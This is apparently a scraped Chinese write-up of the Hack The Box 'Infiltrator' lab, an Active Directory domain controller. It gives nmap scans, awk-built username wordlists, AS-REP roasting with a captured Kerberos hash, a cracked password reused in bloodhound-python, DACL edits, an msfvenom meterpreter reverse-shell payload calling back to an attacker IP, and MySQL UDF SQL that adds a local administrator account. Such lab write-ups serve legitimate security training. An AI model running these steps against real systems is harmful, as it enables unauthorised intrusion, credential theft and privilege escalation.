Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 21:00 EDT Nmap scan report for 10.10.11.31 Host is up (0.38s latency). Not shown: 65511 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 15220/tcp open unknown 15230/tcp open unknown 49667/tcp open unknown 49690/tcp open unknown 49691/tcp open unknown 49694/tcp open unknown 49723/tcp open unknown 49746/tcp open unknown 49879/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 170.18 seconds
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Infiltrator.htb | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-06 00:53:54Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-09-06T00:57:50+00:00; -10m07s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-09-06T00:57:51+00:00; -10m07s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time. 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: INFILTRATOR | NetBIOS_Domain_Name: INFILTRATOR | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: infiltrator.htb | DNS_Computer_Name: dc01.infiltrator.htb | DNS_Tree_Name: infiltrator.htb | Product_Version: 10.0.17763 |_ System_Time: 2024-09-06T00:57:05+00:00 | ssl-cert: Subject: commonName=dc01.infiltrator.htb | Not valid before: 2024-07-30T13:20:17 |_Not valid after: 2025-01-29T13:20:17 |_ssl-date: 2024-09-06T00:57:49+00:00; -10m08s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 15220/tcp open unknown 15230/tcp open unknown 49667/tcp open msrpc Microsoft Windows RPC 49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49691/tcp open msrpc Microsoft Windows RPC 49694/tcp open msrpc Microsoft Windows RPC 49723/tcp open msrpc Microsoft Windows RPC 49746/tcp open msrpc Microsoft Windows RPC 49879/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
<h4>.01 David Anderson</h4> <h4>.02 Olivia Martinez</h4> <h4>.03 Kevin Turner</h4> <h4>.04 Amanda Walker</h4> <h4>.05 Marcus Harris</h4> <h4>.06 Lauren Clark</h4> <h4>.07 Ethan Rodriguez</h4>
awk切分tmp文件为自己要的部分
1
awk -F'>|<' '{print substr($3,5)}' tmp > username
1 2 3 4 5 6 7 8
└─$ cat username David Anderson Olivia Martinez Kevin Turner Amanda Walker Marcus Harris Lauren Clark Ethan Rodriguez
很nice
SMB渗透
现在需要确认目标系统的账号
一般登录域用户的账号是长这个样子
1
username@xxxx.com
#awk #生成域用户字典
1 2 3 4 5 6 7 8 9 10 11 12
awk ' { name = $0 split(name, parts, " ") first = tolower(parts[1]) last = tolower(parts[2]) print first "." last "@infiltrator.htb" print first "_" last "@infiltrator.htb" print substr(first, 1, 1) "." last "@infiltrator.htb" print substr(first, 1, 1) "_" last "@infiltrator.htb" } ' username > AD_username
[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:52c941038bffe158a729e721a83eca5c$2478d99303d3d9edfd1cbadb41a6463a2df4a97acdf4da4e2c185394c651e78019bb401643cd1c86cd20f9edc5b81025b12fcc553aaa2db741eee0ce7d0a2b86b6ef1a71bf90fb31d7d4cd5d7a6fb44a89cd64613d263e59d00910d52924d2dfb21a0c6db95e996cb51806865d536252484a78a81238161462bb029cdf37c0181e85f038578216f4653351edfb24c46e10faafe0536a539e7a2c52ffccd5503031c177e0564b1b431bc7e02cc1424628dd238503c0a1f58e5398dfb9d9985307f650f52f1165317a20617a2bb4aa2872113f6f3ceb218e226d97551dd599c3cff76e5b47bdfa6d8517f92733073d702951b4
Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash:
[*] Requesting shares on dc01.infiltrator.htb..... [-] share 'ADMIN$' is not writable. [-] share 'C$' is not writable. [-] share 'NETLOGON' is not writable. [-] share 'SYSVOL' is not writable.
└─$ bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip INFO: Found AD domain: infiltrator.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Found 14 users INFO: Found 58 groups INFO: Found 2 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc01.infiltrator.htb INFO: Done in 01M 03S INFO: Compressing output into 20240906085109_bloodhound.zip
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20240906-093926.bak [*] DACL modified successfully!
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: reverse.exe
C:\Users\M.harris>dir "c:\Program Files\Output Messenger\" dir "c:\Program Files\Output Messenger\" Volume in drive C has no label. Volume Serial Number is 96C7-B603
C:\Users\M.harris>dir "C:/Program Files/Output Messenger Server/Plugins/" dir "C:/Program Files/Output Messenger Server/Plugins/" Volume in drive C has no label. Volume Serial Number is 96C7-B603
Directory of C:\Program Files\Output Messenger Server\Plugins
# CHech the linux comments for more indications USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll')); show variables like '%plugin%'; SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add");
1 2 3 4 5 6 7 8
MariaDB [outputwall]> show variables like '%secure_file_priv%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | | +------------------+-------+ 1 row in set (0.905 sec)
G了,那个文件夹它真没有,而我的用户(m.harris)没那个写入权限,没办法进行修改
1 2 3
MariaDB [mysql]> SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll'; ERROR 1 (HY000): Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\lib_mysqludf_sys_32.dll' (Errcode: 2 "No such file or directory")
02/23/2024 06:06 AM <DIR> . 02/23/2024 06:06 AM <DIR> .. 12/04/2023 10:22 AM <DIR> Common Files 08/21/2024 01:50 PM <DIR> Hyper-V 02/19/2024 04:52 AM <DIR> internet explorer 02/23/2024 06:06 AM <DIR> Output Messenger 09/06/2024 06:17 AM <DIR> Output Messenger Server 12/12/2023 11:04 AM <DIR> PackageManagement 02/19/2024 05:16 AM <DIR> Update Services 12/04/2023 10:23 AM <DIR> VMware 11/05/2022 12:03 PM <DIR> Windows Defender 08/21/2024 01:50 PM <DIR> Windows Defender Advanced Threat Protection 11/05/2022 12:03 PM <DIR> Windows Mail 08/21/2024 01:50 PM <DIR> Windows Media Player 09/15/2018 12:19 AM <DIR> Windows Multimedia Platform 09/15/2018 12:28 AM <DIR> windows nt 11/05/2022 12:03 PM <DIR> Windows Photo Viewer 09/15/2018 12:19 AM <DIR> Windows Portable Devices 09/15/2018 12:19 AM <DIR> Windows Security 12/12/2023 11:04 AM <DIR> WindowsPowerShell 0 File(s) 0 bytes 20 Dir(s) 46,382,149,632 bytes free
